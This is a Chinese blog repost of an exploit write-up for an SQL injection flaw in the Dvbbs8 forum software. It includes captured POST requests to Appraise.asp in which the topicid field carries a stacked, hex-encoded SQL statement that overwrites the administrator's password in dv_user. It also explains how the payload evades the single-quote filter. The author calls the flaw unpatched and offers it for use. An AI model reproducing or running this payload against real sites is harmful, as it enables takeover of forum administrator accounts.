Dvbbs8严重漏洞
生活随笔
收集整理的這篇文章主要介紹了
Dvbbs8严重漏洞
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
作者:Allyesno[AT]77169.org
我這邊已經(jīng)假設(shè)好了一個DVBBS8 SQL:
我們先來注冊一個用戶,隨便找個帖子。剛才弄壞了。。。。
我們來重新發(fā)個帖子。點發(fā)表評論,這里來抓包 POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/x-shockwave-flash, */*
Referer: [url]http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 91
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0
boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test
OK,LET's start
LET's make fun
userpost是用戶發(fā)表過的帖子數(shù)量。算錯了
script language='javascript'> <font face="宋體" size=2>
p>Microsoft OLE DB Provider for SQL Server</font> <font face="宋體" size=2>錯誤
'80040e14'</font>
p>
font face="宋體" size=2>第 1 行: ';' 附近有語法錯誤。</font>
p>
font face="宋體" size=2>/dvbbs8/inc/Dv_ClsMain.asp</font><font face="宋體" siz
2>,行 1504</font>
出現(xiàn)一個這個,不要管他,其實我們已經(jīng)修改成功了!
文章:100
我們繼續(xù)來修改,其實是這樣的,程序有點小問題需要我們來解決 TopicID = Dvbbs.CheckStr(Request.Form("topicid"))
Public Function Checkstr(Str)
?If Isnull(Str) Then
?CheckStr = ""
?Exit Function
?End If
?Str = Replace(Str,Chr(0),"")
?CheckStr = Replace(Str,"'","''")
?End Function很明顯過濾了單引號。。。。我們這樣來饒過
還是修改一下密碼吧,現(xiàn)在ADMIN的密碼是admin888,我們來把他修改成123456[/code]declare @a sysname
select @a=0x3400390062006100350039006100620062006500350036006500300035003700
update [dv_user] set userpassword=@a where userid=1[/code]這樣可以修改成功!!!我們把他改回來 %3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1OK,這句語句也可以執(zhí)行
156 POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/x-shockwave-flash, */*
Referer: [url]http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=3&page=1[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 242
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=Y1tGx4j886XtB846&userhidden=2; List=list1=1; w0802=5; rtime=0; ltime=1186474916718; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0
boardid=1&topicid=3%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1&announceid=3&atype=0&a1=0&a2=0&atitle=22&acodestr=3297&acontent=33看見沒,已經(jīng)修改成了123456
由于漏洞比較嚴重,請大家謹慎使用,官方還未打補丁!!!!!!
轉(zhuǎn)載于:https://blog.51cto.com/foxhack/37662
總結(jié)
以上是生活随笔為你收集整理的Dvbbs8严重漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: NetApp SE 实验室报告:SAN
- 下一篇: 数组到指针的隐式转换